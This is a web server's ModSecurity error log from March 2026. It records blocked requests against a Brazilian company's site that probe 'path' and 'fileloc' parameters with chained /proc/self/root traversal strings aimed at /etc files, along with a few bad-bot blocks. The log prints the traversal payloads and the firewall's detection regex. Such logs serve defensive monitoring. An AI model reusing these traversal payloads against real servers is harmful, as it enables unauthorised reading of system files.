[Wed Mar 18 11:33:22.795883 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:45644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3svu8EFLIOrSqIpsMAwAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:24.096125 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:45660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3tAkwaGbbGflqUZAYMAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:25.429556 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:45676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3tfu8EFLIOrSqIpsMBgAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:26.775533 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:45678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3tsdf6f5d65gmYZTd1gAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:28.011677 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:45690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3uOoXxyEfFpUF8f91wAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:31.572762 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:45706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3u-yqAr6etmhZHNrKuQAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:32.872630 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:53474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3vPu8EFLIOrSqIpsMCgAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:34.186513 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:53478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3vtY0UrI5A3LftIy3ZAAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:34.431381 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.241.31:52816] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3vkzinOy1jxa1j4ceEAAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:33:35.460043 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:53480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3v8df6f5d65gmYZTd2wAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:36.807505 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:53484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3wNY0UrI5A3LftIy3ZwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:44.600649 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.228.61:42944] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq3yOoXxyEfFpUF8f91zQAAAUQ"]
[Wed Mar 18 11:33:49.414824 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.244.43:54558] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq3zew_le52K8_3pV3oVAAAAgY"]
[Wed Mar 18 11:33:53.758792 2026] [mime_magic:error] [pid 29882:tid 140411716749056] (70014)End of file found: [client 57.141.18.88:43654] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:33:57.780079 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:53500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq31eoXxyEfFpUF8f912AAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:34:34.107199 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.241.31:34056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3-imAPhZkrhU8w4l2EgAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:35:38.935502 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:52104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4Ouw_le52K8_3pV3oowAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:35:46.956787 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:34370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4Qsdf6f5d65gmYZTeIwAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:35:48.317699 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:34372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4RMdf6f5d65gmYZTeJAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:35:50.766706 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:40852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4RtY0UrI5A3LftIy3zwAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:02.921621 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:40860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4Uuw_le52K8_3pV3otQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:04.585285 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:58038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4VPu8EFLIOrSqIpsMmAAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:08.694745 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:56928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4WOyqAr6etmhZHNrLKQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
